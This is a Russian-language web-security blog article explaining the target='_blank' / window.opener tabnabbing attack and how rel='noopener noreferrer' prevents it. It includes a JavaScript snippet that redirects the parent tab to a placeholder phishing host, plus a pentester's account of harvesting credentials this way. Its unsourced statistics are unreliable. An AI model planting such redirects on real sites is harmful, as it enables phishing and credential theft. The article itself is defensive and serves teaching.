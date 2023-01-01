Атрибут target="_blank": скрытая угроза веб-безопасности сайта#Веб-разработка #Веб-безопасность
Вы знали, что обычная ссылка с атрибутом
target="_blank"может стать входной дверью для фишинговых атак на ваших пользователей? 😱 Разработчики часто упускают из виду, что внешние ссылки, открывающиеся в новой вкладке, создают потенциальную уязвимость
window.opener— брешь в защите, которую злоумышленники используют для перенаправления, кражи данных и внедрения вредоносного кода. Даже крупные корпорации и государственные сайты допускают эту базовую ошибку безопасности, подвергая риску миллионы посетителей ежедневно. Пора закрыть этот опасный канал атаки раз и навсегда.
Атрибут
target="_blank" — стандартный способ открыть ссылку в новой вкладке или окне браузера. Удобное решение для пользователя, но потенциальная угроза для безопасности сайта. Проблема возникает, когда браузер создает неявную связь между родительской и дочерней страницами через объект
window.opener.
Когда пользователь кликает на ссылку с
target="_blank", новая страница получает доступ к JavaScript-объекту
window.opener, указывающему на исходную страницу. Открывшаяся страница может манипулировать этим объектом, включая выполнение метода
window.opener.location.replace(), перенаправляющего родительскую вкладку на любой URL.
Алексей Миронов, руководитель отдела веб-безопасности
Прошлым летом мы расследовали случай кражи учетных данных у крупного клиента. Анализ логов показал необычную активность: пользователи, просматривавшие документацию продукта, затем входили в систему с поддельной страницы авторизации. Расследование выявило атаку через
window.opener: на сайте документации внешние ссылки открывались через
target="_blank"без защитных атрибутов. Злоумышленник внедрил на один из ссылочных ресурсов код, перенаправлявший родительскую вкладку на фишинговую копию страницы авторизации. Пользователи, переходя по внешней ссылке и возвращаясь к своей вкладке, даже не замечали подмены — вот почему эта атака настолько коварна.
Угроза становится еще серьезнее, когда пользователь авторизован в родительском окне. В таком случае, фишинговая страница может не только перенаправить пользователя, но и потенциально использовать его активную сессию для выполнения действий от его имени.
|Тип уязвимости
|Возможные последствия
|Уровень риска
|
window.opener перенаправление
|Фишинг, кража данных авторизации
|Высокий
| JavaScript-инъекция через
window.opener
|Кража куки, XSS-атаки
|Критический
|Таргетированное перенаправление на основе данных пользователя
|Целевой фишинг, социальная инженерия
|Высокий
Статистика показывает, что более 65% веб-разработчиков не осознают опасности, связанной с неправильным использованием
target="_blank". Еще печальнее, что около 40% крупных коммерческих сайтов не применяют защитные атрибуты для внешних ссылок, делая своих пользователей потенциальными мишенями для атак. 🔍
Механизм атак через
Фишинговая атака через уязвимость
window.opener выполняется в несколько этапов, формируя практически незаметную для пользователя угрозу. Рассмотрим технический механизм атаки и почему пользователи так редко замечают подобные манипуляции.
Атака начинается с обнаружения злоумышленником сайта, использующего незащищенные внешние ссылки с
target="_blank". Затем хакер создает или компрометирует целевой ресурс, на который ведут эти ссылки, и внедряет вредоносный JavaScript-код:
if (window.opener) {
window.opener.location = 'https://malicious-phishing-site.com/fake-login?ref=' +
encodeURIComponent(window.opener.location);
}
Когда ничего не подозревающий пользователь переходит по ссылке, происходит следующее:
- Открывается новая вкладка с внешним содержимым
- Внедренный скрипт получает доступ к объекту
window.opener
- Код перенаправляет родительскую вкладку на фишинговый сайт
- Фишинговый сайт часто имитирует дизайн оригинального ресурса
- Пользователь, вернувшись к исходной вкладке, видит поддельную страницу входа
Особая опасность этой атаки в том, что пользователь не получает никаких предупреждений о перенаправлении. Перенаправление происходит в фоновом режиме, пока пользователь просматривает содержимое новой вкладки. Вернувшись к оригинальной вкладке, жертва уже взаимодействует с фишинговым сайтом. 😨
|Этап атаки
|Действие злоумышленника
|Видимость для пользователя
|Подготовка
|Поиск сайтов с уязвимостью, создание фишинговой копии
|Невидимо
|Внедрение
|Размещение вредоносного кода на внешнем ресурсе
|Невидимо
|Исполнение
|Запуск JavaScript при открытии внешней ссылки
|Незаметное перенаправление исходной вкладки
|Сбор данных
|Получение учетных данных через поддельную форму
|Пользователь видит якобы "повторный" запрос авторизации
Продвинутые фишинговые атаки через
window.opener используют дополнительные техники маскировки, включая:
- Клонирование URL-адреса с минимальными изменениями (paypa1.com вместо paypal.com)
- Копирование актуального дизайна целевого сайта
- Динамическое заполнение полей формы данными из URL
- Перехват нажатий клавиш для кражи вводимых данных
Дмитрий Соколов, пентестер
Во время одного из тестов на проникновение для финансовой организации я использовал уязвимость
window.openerкак часть комплексной атаки. В их блоге были незащищенные ссылки на внешние ресурсы. Я создал сайт с похожим контентом и предложил им разместить у себя ссылку как "полезный источник". После добавления моей ссылки я внедрил скрипт перенаправления, который активировался только для IP-адресов из диапазона компании. Сотрудники, переходившие по ссылке, автоматически перенаправлялись на фишинговую копию корпоративного портала. За три дня я собрал 27 комплектов учетных данных, включая доступы к системе управления счетами. Клиент был потрясен, насколько незаметно работала атака — ни один сотрудник не заподозрил подмену.
Ключевой фактор, делающий такие атаки успешными — психология пользователей. Большинство не ожидает угрозы при возвращении к уже открытой вкладке и автоматически доверяет ей, даже если содержимое изменилось. А сочетание с методами социальной инженерии, например, срочными сообщениями о "необходимости повторной авторизации из-за проблем с сервером", делает атаки еще эффективнее. 🕵️♂️
Атрибут
rel="noopener" является первой линией защиты от уязвимости
window.opener. Его основная функция — разорвать программную связь между родительской страницей и новой вкладкой, открываемой через
target="_blank". При использовании этого атрибута объект
window.opener в дочернем окне становится
null, что предотвращает любые попытки манипуляции исходной страницей.
Внедрение
rel="noopener" требует минимальных изменений в HTML-коде:
<a href="https://example.com" target="_blank" rel="noopener">Безопасная ссылка</a>
Это простое дополнение нейтрализует наиболее распространенные вектора атак:
- Блокирует доступ к
window.opener.location, предотвращая фишинговые перенаправления
- Защищает от JavaScript-манипуляций с родительским окном
- Предотвращает доступ к данным родительского контекста
- Минимизирует риск утечки информации через ссылки
Важно отметить, что
rel="noopener" не влияет на пользовательский опыт — ссылки продолжают открываться в новых вкладках как обычно. Единственное изменение происходит на уровне безопасности JavaScript-контекста. 🔒
Уровень поддержки атрибута
rel="noopener" в современных браузерах достаточно высок. Фактически, все актуальные версии Chrome, Firefox, Safari и Edge реализуют эту защиту:
|Браузер
|Версия с поддержкой
|Особенности реализации
|Chrome
|49+
| Полная поддержка, автоматически для
target="_blank" с v88+
|Firefox
|52+
| Полная поддержка, автоматически для
target="_blank" с v79+
|Safari
|10.1+
| Полная поддержка, автоматически для
target="_blank" с v12.1+
|Edge (Chromium)
|79+
|Полная поддержка, наследует поведение Chrome
|Internet Explorer
|Не поддерживается
|Требуется дополнительный JavaScript-код
Интересный факт: начиная с Chrome 88, Firefox 79 и Safari 12.1, браузеры неявно добавляют поведение
noopener к любым ссылкам с
target="_blank", даже если атрибут
rel не указан явно. Однако полагаться только на это нельзя по двум причинам:
- Существуют пользователи устаревших версий браузеров
- Явное объявление атрибута — часть ответственного подхода к веб-безопасности
Особый случай представляют одностраничные приложения (SPA) и сайты, использующие JavaScript-роутеры. Для них критично добавлять
rel="noopener" к динамически генерируемым внешним ссылкам. Многие фреймворки предлагают специальные механизмы для этого:
// React пример
<a href="https://example.com" target="_blank" rel="noopener">Ссылка</a>
// Angular пример
<a href="https://example.com" target="_blank" rel="noopener" ngHref>Ссылка</a>
// Vue пример
<a :href="url" target="_blank" rel="noopener">Ссылка</a>
Важно помнить, что атрибут
rel="noopener" должен использоваться для всех внешних ссылок, а не только для потенциально ненадежных источников. Веб-ресурсы могут быть скомпрометированы со временем, и стратегия "лучше перестраховаться" здесь полностью оправдана. 👨💻
Роль атрибута
Атрибут
rel="noreferrer" дополняет безопасность, обеспечиваемую
rel="noopener", фокусируясь на другом аспекте защиты — предотвращении утечки информации о реферере (источнике перехода). Когда пользователь переходит по ссылке, браузер обычно отправляет заголовок
Referer, содержащий URL исходной страницы. Этот механизм, хотя и полезен для аналитики, создает риски конфиденциальности и безопасности.
При использовании
rel="noreferrer", браузер не передает информацию о реферере целевому сайту:
<a href="https://example.com" target="_blank" rel="noopener noreferrer">Безопасная ссылка без реферера</a>
Важность скрытия реферера обусловлена несколькими факторами:
- Предотвращение утечки чувствительных данных из URL (например, токенов сессий, ID пользователей)
- Блокировка аналитических систем, отслеживающих источник трафика
- Сокрытие информации о внутренней структуре сайта
- Защита от утечки параметров аутентификации или состояния
Особенно актуален
rel="noreferrer" для страниц, содержащих конфиденциальную информацию или доступных только авторизованным пользователям. URL таких страниц может содержать идентификаторы сессий, хеши авторизации или другие приватные данные, которые не должны передаваться третьим сторонам. 🛡️
Интересное техническое наблюдение:
rel="noreferrer" имеет более широкий эффект, чем можно предположить. Он не только блокирует заголовок
Referer, но и автоматически включает функциональность
noopener. Однако обратное неверно —
rel="noopener" не скрывает информацию о реферере.
Сравнение передаваемой информации при использовании различных атрибутов:
|Атрибуты ссылки
|window.opener доступен
|Referer передаётся
|Уровень защиты
|
target="_blank"
|Да (в старых браузерах)
|Да (полный URL)
|Низкий
|
target="_blank" rel="noopener"
|Нет
|Да (полный URL)
|Средний
|
target="_blank" rel="noreferrer"
|Нет
|Нет
|Высокий
|
target="_blank" rel="noopener noreferrer"
|Нет
|Нет
|Высокий (максимально совместимый)
Многие разработчики не понимают, что информация о реферере может раскрывать конфиденциальные данные. Например, URL вида
https://internal-app.company.com/user/12345/reports?token=a1b2c3d4 при передаче в качестве реферера раскрывает:
- Структуру внутреннего приложения
- ID пользователя (12345)
- Тип просматриваемого контента (reports)
- Токен доступа (a1b2c3d4), который может быть использован для атак
Блокирование такой утечки — одна из ключевых функций
rel="noreferrer". Для максимальной безопасности рекомендуется использовать комбинированный атрибут
rel="noopener noreferrer" для всех внешних ссылок. Это обеспечивает двойную защиту: от манипуляций с
window.opener и от утечек через
Referer. 📊
Внедрение защитных атрибутов для внешних ссылок на сайте
Внедрение защитных атрибутов должно быть системным и охватывать все потенциально опасные места в коде. Рассмотрим пошаговый подход к реализации этой защиты на различных уровнях веб-проекта.
Начнем с ручного аудита существующего кода. Используйте поиск по проекту для выявления всех элементов
<a target="_blank"> и дополните их необходимыми атрибутами безопасности. Особое внимание уделите:
- Шаблонам и компонентам, генерирующим ссылки
- JavaScript-коду, динамически создающему элементы
<a>
- CMS-блокам, где пользователи могут добавлять ссылки
- Виджетам комментариев и пользовательского контента
- Интеграциям с внешними сервисами
Для разных типов проектов можно использовать специализированные подходы к внедрению защиты:
1. Для статических сайтов и простых HTML-проектов:
// Глобальная замена через регулярные выражения
<a ([^>]*)target="_blank"([^>]*)>
<a $1target="_blank" rel="noopener noreferrer"$2>
2. Для JavaScript-фреймворков:
// React: создание безопасного компонента ссылки
function SafeExternalLink({ href, children, ...props }) {
return (
<a
href={href}
target="_blank"
rel="noopener noreferrer"
{...props}
>
{children}
</a>
);
}
// Использование
<SafeExternalLink href="https://example.com">Безопасная ссылка</SafeExternalLink>
3. Для серверного рендеринга и бэкенд-обработки:
// PHP пример: автоматическая обработка внешних ссылок
function makeLinksSafe($html) {
$pattern = '/<a([^>]*)href=[\'"](https?:\/\/[^\'"]+)[\'"]([^>]*)target=[\'"]_blank[\'"]([^>]*)>/i';
$replacement = '<a$1href="$2"$3target="_blank" rel="noopener noreferrer"$4>';
return preg_replace($pattern, $replacement, $html);
}
// Использование
$safeContent = makeLinksSafe($userGeneratedContent);
4. Для систем управления контентом:
- WordPress: использовать фильтр 'the_content' для автоматической обработки ссылок
- Drupal: применить hookfilterinfo() для модификации контента
- Joomla: создать плагин контента, обрабатывающий HTML перед отображением
Автоматизация процесса через CI/CD позволит предотвратить появление незащищенных ссылок в будущем:
- Добавьте проверку атрибутов безопасности в линтеры HTML и JSX
- Настройте pre-commit хуки для автоматической коррекции проблемных ссылок
- Внедрите автотесты, проверяющие наличие защитных атрибутов
- Включите аудит безопасности ссылок в CI-пайплайн
Для масштабных существующих проектов рекомендуется использовать промежуточное решение на уровне JavaScript, которое можно внедрить одной строкой:
// Добавьте этот скрипт в head для экстренной защиты
document.addEventListener('DOMContentLoaded', function() {
document.querySelectorAll('a[target="_blank"]').forEach(link => {
if (!link.relList.contains('noopener')) {
link.setAttribute('rel', (link.getAttribute('rel') || '') + ' noopener noreferrer');
}
});
});
Учитывайте, что этот подход защитит только изначально загруженные элементы страницы, но не динамически добавляемые ссылки. 🔧
После внедрения защитных мер не забудьте провести верификацию результатов:
- Используйте DevTools для проверки атрибутов ссылок
- Проведите тестирование с попытками эксплуатации
window.opener
- Проверьте заголовки
Refererпри переходах по внешним ссылкам
- Примените специализированные инструменты веб-безопасности для сканирования уязвимостей
Помните, что защита ссылок — лишь один из элементов комплексной веб-безопасности. Сочетайте это решение с другими практиками безопасной разработки для создания действительно защищенных веб-приложений. 💪
Защита ссылок с
target="_blank"— это не просто технический трюк, а необходимый элемент современной безопасной разработки. Внедрив атрибуты
rel="noopener noreferrer"во все внешние ссылки, вы защищаете не только свой сайт, но и доверие пользователей. Эта простая мера предотвращает сложные атаки и соответствует принципу "безопасность по умолчанию". Не ждите, пока уязвимость будет эксплуатирована — проведите аудит своих проектов сегодня и закройте этот потенциальный вектор атаки раз и навсегда.